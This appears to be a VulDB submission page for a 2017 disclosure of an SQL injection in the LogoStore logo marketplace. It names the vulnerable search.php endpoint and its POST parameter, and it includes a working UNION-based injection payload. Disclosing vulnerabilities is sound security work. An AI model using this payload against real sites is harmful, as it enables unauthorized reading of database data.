提交 #18: LogoStore - SQL Injection信息

标题LogoStore - SQL Injection
描述Introduction Exploit Title: LogoStore - SQL Injection Date: 27.01.2017 Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own! Type of vulnerability: An SQL Injection vulnerability in LogoStore allows attackers to read arbitrary data from the database. Vulnerable URL : http://locahost/LogoStore/search.php Mehod : POST Parameter : query Simple Payload: Type: UNION query Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
用户
 KAAN KAMIS (UID 213)
提交2017-02-01 12時27分 (9 年前)
管理2017-02-03 23時15分 (2 days later)
状态已接受
VulDB条目96540 [LogoStore /LogoStore/search.php 查询 SQL注入]
积分17

Do you know our Splunk app?

Download it now for free!